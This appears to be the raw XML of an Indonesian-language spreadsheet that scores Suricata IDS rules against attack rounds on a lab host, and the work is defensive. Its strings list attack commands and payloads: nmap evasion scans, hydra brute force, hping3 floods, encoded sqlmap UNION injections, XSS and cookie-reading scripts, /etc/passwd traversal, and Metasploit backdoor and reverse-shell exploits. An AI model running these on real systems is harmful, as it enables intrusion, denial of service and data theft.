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e 11" sheetId="1" r:id="rId5"/>
    <sheet state="visible" name="Ronde 12" sheetId="2" r:id="rId6"/>
    <sheet state="visible" name="Ronde 13" sheetId="3" r:id="rId7"/>
    <sheet state="visible" name="Ronde 14" sheetId="4" r:id="rId8"/>
    <sheet state="visible" name="Ronde 15" sheetId="5" r:id="rId9"/>
    <sheet state="visible" name="Ronde 16" sheetId="6" r:id="rId10"/>
    <sheet state="visible" name="Ronde 17" sheetId="7" r:id="rId11"/>
    <sheet state="visible" name="Ronde 18" sheetId="8" r:id="rId12"/>
    <sheet state="visible" name="Ronde 19" sheetId="9" r:id="rId13"/>
    <sheet state="visible" name="Ronde 20" sheetId="10" r:id="rId14"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1410" uniqueCount="109">
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Ronde</t>
  </si>
  <si>
    <t>Fase (Set)</t>
  </si>
  <si>
    <t>Skenario Serangan</t>
  </si>
  <si>
    <t>Level</t>
  </si>
  <si>
    <t>Teknik / Payload (Detail)</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>TP (Deteksi Benar)</t>
  </si>
  <si>
    <t>FN (Gagal Deteksi)</t>
  </si>
  <si>
    <t>FP (Salah Alert Noise)</t>
  </si>
  <si>
    <t>TN (Noise Aman)</t>
  </si>
  <si>
    <t>Request</t>
  </si>
  <si>
    <t>Nama Alert Suricata</t>
  </si>
  <si>
    <t>Catatan</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>Nmap</t>
  </si>
  <si>
    <t>Aggressive Service Scan (T4)</t>
  </si>
  <si>
    <t>nmap -sV -T4 -F 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S01-NMAP] Nmap SYN Port Scan - Aggressive Scan Detected (High Confidence)</t>
  </si>
  <si>
    <t>MTU Fragmentation (16-byte)</t>
  </si>
  <si>
    <t>nmap --mtu 16 -sS -p 21,22,80,3306 ...</t>
  </si>
  <si>
    <t>[TA-SIG::S01-NMAP] Nmap Evasion Technique - Packet Fragmentation (-f / --mtu) (High Confidence), [TA-SIG::S02-HYDRA-SSH] SSH Authentication Brute Force Attempt (High Confidence)</t>
  </si>
  <si>
    <t>Null Scan (No Flags)</t>
  </si>
  <si>
    <t>nmap -D RND:5 -sN -p 80 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S01-NMAP-NULL] Nmap Stealth Scan - NULL Scan Detected (High Confidence)</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>FTP Fast Brute Force</t>
  </si>
  <si>
    <t>hydra -l msfadmin -P ... ftp://192.168.113.50 -t 4</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>[TA-SIG::S02-HYDRA-FTP] FTP Authentication Brute Force Attempt (High Confidence)</t>
  </si>
  <si>
    <t>FTP Low &amp; Slow (Wait 15s)</t>
  </si>
  <si>
    <t>hydra ... ftp://... -t 1 -w 15</t>
  </si>
  <si>
    <t>FTP Password Spraying</t>
  </si>
  <si>
    <t>hydra -L ... -p password123 ftp://... -t 4</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t>UDP Flood (Port 53/DNS)</t>
  </si>
  <si>
    <t>timeout 30 hping3 -2 -p 53 --flood ...</t>
  </si>
  <si>
    <t>[TA-SIG::S03-DOS-UDP] UDP Flood - High-Volume DNS Traffic Detected (High Confidence)</t>
  </si>
  <si>
    <t>SYN Flood (Port 21/FTP)</t>
  </si>
  <si>
    <t>timeout 30 hping3 -S -p 21 --flood ...</t>
  </si>
  <si>
    <t>[TA-SIG::S03-DOS-SYN] TCP SYN Flood - Distributed / Random Source Attack Detected (High Confidence)</t>
  </si>
  <si>
    <t>Random Source + SYN FTP</t>
  </si>
  <si>
    <t>timeout 30 hping3 -S -p 21 --flood --rand-source</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>Basic Injection (Batch Mode)</t>
  </si>
  <si>
    <t>sqlmap -u "url" --batch --dbs</t>
  </si>
  <si>
    <t>/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716b706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x776f65796f61%2Cschema_name%29%29%2C0x7170767871%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23&amp;Submit=Submit</t>
  </si>
  <si>
    <t>[TA-SIG::S04-SQLI-LOGIC]SQL Injection - Boolean-Based Injection in URI (Tamper Detected) (High Confidence)
[TA-SIG::S04-SQLI-HEADER] SQL Injection - Blind Injection in HTTP Header / Cookie (High Confidence)
[TA-SIG::S04-SQLI-UNION] SQL Injection - Obfuscated UNION/SELECT Injection in URI (High Confidence)
[TA-SIG::S04-SQLI-TIME] SQL Injection - Time-Based Blind Injection Detected (High Confidence)</t>
  </si>
  <si>
    <t>Tamper: Between (Logical Obfus.)</t>
  </si>
  <si>
    <t>sqlmap ... --tamper=between</t>
  </si>
  <si>
    <t>/dvwa/vulnerabilities/sqli/?id=1%27%2F%2A%2A%2FUNIOn%2F%2A%2A%2FAlL%2F%2A%2A%2FSelecT%2F%2A%2A%2FNulL%2CCOncaT%280x716b706a71%2CJsoN_arRAYAGG%28COncaT_WS%280x776f65796f61%2CSCHEMa_NaME%29%29%2C0x7170767871%29%2F%2A%2A%2FFRom%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%23&amp;Submit=Submit</t>
  </si>
  <si>
    <t>Time-Based + Random Agent</t>
  </si>
  <si>
    <t>sqlmap ... --technique=T ... --random-agent</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>Reflected XSS (Script Tag)</t>
  </si>
  <si>
    <t>curl ... ?name=&lt;script&gt;alert('XSS')&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E </t>
  </si>
  <si>
    <t>[TA-SIG::S05-XSS-TAG-REFLECTED] XSS - HTML Tag Injection in URI (High Confidence)</t>
  </si>
  <si>
    <t>Evasion: SVG OnLoad</t>
  </si>
  <si>
    <t>curl ... ?name=&lt;svg/onload=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/xss_r/?name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E </t>
  </si>
  <si>
    <t>[TA-SIG::S05-XSS-EVENT-REFLECTED] XSS - HTML Event Handler Injection in URI (High Confidence)</t>
  </si>
  <si>
    <t>Stored XSS: Page Redirect</t>
  </si>
  <si>
    <t>curl -X POST -d "...&lt;script&gt;window.location=..."</t>
  </si>
  <si>
    <t>[POST Data Body] : txtName=HackerA&amp;mtxMessage=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp;btnSign=Sign+Guestbook</t>
  </si>
  <si>
    <t>[TA-SIG::S05-XSS-TAG-STORED] XSS - HTML Tag Injection in POST Body (High Confidence)</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t>Basic Traversal (/etc/passwd)</t>
  </si>
  <si>
    <t>curl .../fi/?page=../../../../../etc/passwd</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd </t>
  </si>
  <si>
    <t>[TA-SIG::S06-LFI-TRAVERSAL] Local File Inclusion - Directory Traversal Attempt in URI (High Confidence), [TA-SIG::S06-LFI-FAILSAFE]Local File Inclusion - Sensitive File Access Attempt (OS Files) in URI (High Confidence), [TA-SIG::S06-LFI-WRAPPER] Local File Inclusion - PHP Wrapper / Filter Injection in URI (High Confidence)</t>
  </si>
  <si>
    <t>Evasion: Double URL Encode</t>
  </si>
  <si>
    <t>curl .../fi/?page=%252e%252e%252f...</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/fi/?page=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd </t>
  </si>
  <si>
    <t>PHP Wrapper Target: /etc/group</t>
  </si>
  <si>
    <t>curl ...php://filter/.../resource=.../etc/group</t>
  </si>
  <si>
    <t>/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd</t>
  </si>
  <si>
    <t>RCE</t>
  </si>
  <si>
    <t>Exploit VSFTPD (Backdoor)</t>
  </si>
  <si>
    <t>use exploit/unix/ftp/vsftpd_234_backdoor</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-VSFTPD] Remote Code Execution - VSFTPD v2.3.4 Backdoor Trigger Attempt (High Confidence)</t>
  </si>
  <si>
    <t>Samba + Python Reverse Shell</t>
  </si>
  <si>
    <t>set PAYLOAD cmd/unix/reverse_python</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-SAMBA] Remote Code Execution Samba Usermap Script Command Injection (CVE-2007-2447) (High Confidence)</t>
  </si>
  <si>
    <t>DistCC + Python Reverse Shell</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-DISTCC] Remote Code Execution - DistCC Daemon Command Injection Attempt (High Confidence), [TA-SIG::S07-RCE-CALLBACK] Remote Code Execution - Reverse Shell Callback Connection Detected (High Confidence)</t>
  </si>
  <si>
    <t>Normal</t>
  </si>
  <si>
    <t>Download File Binary (.exe)</t>
  </si>
  <si>
    <t>wget ... procmon.exe</t>
  </si>
  <si>
    <t>Exp: ET POLICY PE EXE</t>
  </si>
  <si>
    <t>System Update (APT User-Agent)</t>
  </si>
  <si>
    <t>curl -A "Debian APT..."</t>
  </si>
  <si>
    <t>Exp: ET POLICY GNU/Linux APT</t>
  </si>
  <si>
    <t>SSH Login Valid (Berulang)</t>
  </si>
  <si>
    <t>sshpass ... (loop 5x)</t>
  </si>
  <si>
    <t>Exp: ET SCAN Potential SSH Brute</t>
  </si>
  <si>
    <t>Network Diag (Jumbo Ping)</t>
  </si>
  <si>
    <t>ping -s 2000</t>
  </si>
  <si>
    <t>Exp: GPL ICMP INFO PING</t>
  </si>
  <si>
    <t>FTP Login (Cleartext/Valid)</t>
  </si>
  <si>
    <t>curl ftp://...</t>
  </si>
  <si>
    <t>Exp: ET POLICY FTP Login</t>
  </si>
  <si>
    <t>Akses Non-Standard Port (8180)</t>
  </si>
  <si>
    <t>curl ...:8180</t>
  </si>
  <si>
    <t>Exp: ET POLICY HTTP ... port</t>
  </si>
  <si>
    <t>404 Error Storm (Typo User)</t>
  </si>
  <si>
    <t>curl .../file_acak</t>
  </si>
  <si>
    <t>Exp: ET SCAN Potential HTTP 404</t>
  </si>
  <si>
    <t>Tidak ada alert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</si>
</sst>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1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="10.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF1F1F1F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  <font>
      <i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top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" vertical="top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10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0.0</v>
      </c>
      <c r="I20" s="2">
        <v>1.0</v>
      </c>
      <c r="J20" s="2">
        <v>0.0</v>
      </c>
      <c r="K20" s="2">
        <v>0.0</v>
      </c>
      <c r="L20" s="13"/>
      <c r="M20" s="25" t="s">
        <v>108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20</v>
      </c>
      <c r="I30" s="22">
        <f t="shared" si="1"/>
        <v>1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f>SUM(I2:I28)</f>
        <v>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>SUM(H2:H29)</f>
        <v>21</v>
      </c>
      <c r="I30" s="22"/>
      <c r="J30" s="22">
        <f t="shared" ref="J30:K30" si="1">SUM(J2:J29)</f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6.13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1.0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80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85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14</v>
      </c>
      <c r="D23" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E23" s="17">
        <v>1.0</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>87</v>
      </c>
      <c r="G23" s="17" t="s">
        <v>88</v>
      </c>
      <c r="H23" s="17">
        <v>0.0</v>
      </c>
      <c r="I23" s="17">
        <v>0.0</v>
      </c>
      <c r="J23" s="17">
        <v>0.0</v>
      </c>
      <c r="K23" s="19">
        <v>2.0</v>
      </c>
      <c r="L23" s="20"/>
      <c r="M23" s="21" t="s">
        <v>89</v>
      </c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7">
        <v>23.0</v>
      </c>
      <c r="B24" s="17">
        <v>1.0</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>14</v>
      </c>
      <c r="D24" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E24" s="17">
        <v>2.0</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>90</v>
      </c>
      <c r="G24" s="17" t="s">
        <v>91</v>
      </c>
      <c r="H24" s="17">
        <v>0.0</v>
      </c>
      <c r="I24" s="17">
        <v>0.0</v>
      </c>
      <c r="J24" s="17">
        <v>0.0</v>
      </c>
      <c r="K24" s="19">
        <v>2.0</v>
      </c>
      <c r="L24" s="20"/>
      <c r="M24" s="21" t="s">
        <v>92</v>
      </c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17">
        <v>24.0</v>
      </c>
      <c r="B25" s="17">
        <v>1.0</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>14</v>
      </c>
      <c r="D25" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E25" s="17">
        <v>3.0</v>
      </c>
      <c r="F25" s="17" t="s">
        <v>93</v>
      </c>
      <c r="G25" s="17" t="s">
        <v>94</v>
      </c>
      <c r="H25" s="17">
        <v>0.0</v>
      </c>
      <c r="I25" s="17">
        <v>0.0</v>
      </c>
      <c r="J25" s="17">
        <v>0.0</v>
      </c>
      <c r="K25" s="19">
        <v>2.0</v>
      </c>
      <c r="L25" s="20"/>
      <c r="M25" s="21" t="s">
        <v>95</v>
      </c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17">
        <v>25.0</v>
      </c>
      <c r="B26" s="17">
        <v>1.0</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>14</v>
      </c>
      <c r="D26" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E26" s="17">
        <v>4.0</v>
      </c>
      <c r="F26" s="17" t="s">
        <v>96</v>
      </c>
      <c r="G26" s="17" t="s">
        <v>97</v>
      </c>
      <c r="H26" s="17">
        <v>0.0</v>
      </c>
      <c r="I26" s="17">
        <v>0.0</v>
      </c>
      <c r="J26" s="17">
        <v>0.0</v>
      </c>
      <c r="K26" s="19">
        <v>2.0</v>
      </c>
      <c r="L26" s="20"/>
      <c r="M26" s="21" t="s">
        <v>98</v>
      </c>
      <c r="N26" s="2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17">
        <v>26.0</v>
      </c>
      <c r="B27" s="17">
        <v>1.0</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>14</v>
      </c>
      <c r="D27" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E27" s="17">
        <v>5.0</v>
      </c>
      <c r="F27" s="17" t="s">
        <v>99</v>
      </c>
      <c r="G27" s="17" t="s">
        <v>100</v>
      </c>
      <c r="H27" s="17">
        <v>0.0</v>
      </c>
      <c r="I27" s="17">
        <v>0.0</v>
      </c>
      <c r="J27" s="17">
        <v>0.0</v>
      </c>
      <c r="K27" s="19">
        <v>2.0</v>
      </c>
      <c r="L27" s="20"/>
      <c r="M27" s="21" t="s">
        <v>101</v>
      </c>
      <c r="N27" s="2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17">
        <v>27.0</v>
      </c>
      <c r="B28" s="17">
        <v>1.0</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>14</v>
      </c>
      <c r="D28" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E28" s="17">
        <v>6.0</v>
      </c>
      <c r="F28" s="17" t="s">
        <v>102</v>
      </c>
      <c r="G28" s="17" t="s">
        <v>103</v>
      </c>
      <c r="H28" s="17">
        <v>0.0</v>
      </c>
      <c r="I28" s="17">
        <v>0.0</v>
      </c>
      <c r="J28" s="17">
        <v>0.0</v>
      </c>
      <c r="K28" s="19">
        <v>2.0</v>
      </c>
      <c r="L28" s="20"/>
      <c r="M28" s="21" t="s">
        <v>104</v>
      </c>
      <c r="N28" s="2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17">
        <v>28.0</v>
      </c>
      <c r="B29" s="17">
        <v>1.0</v>
      </c>
      <c r="C29" s="17" t="s">
        <v>14</v>
      </c>
      <c r="D29" s="18" t="s">
        <v>86</v>
      </c>
      <c r="E29" s="17">
        <v>7.0</v>
      </c>
      <c r="F29" s="17" t="s">
        <v>105</v>
      </c>
      <c r="G29" s="17" t="s">
        <v>106</v>
      </c>
      <c r="H29" s="17">
        <v>0.0</v>
      </c>
      <c r="I29" s="17">
        <v>0.0</v>
      </c>
      <c r="J29" s="17">
        <v>0.0</v>
      </c>
      <c r="K29" s="19">
        <v>2.0</v>
      </c>
      <c r="L29" s="20"/>
      <c r="M29" s="21" t="s">
        <v>107</v>
      </c>
      <c r="N29" s="2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2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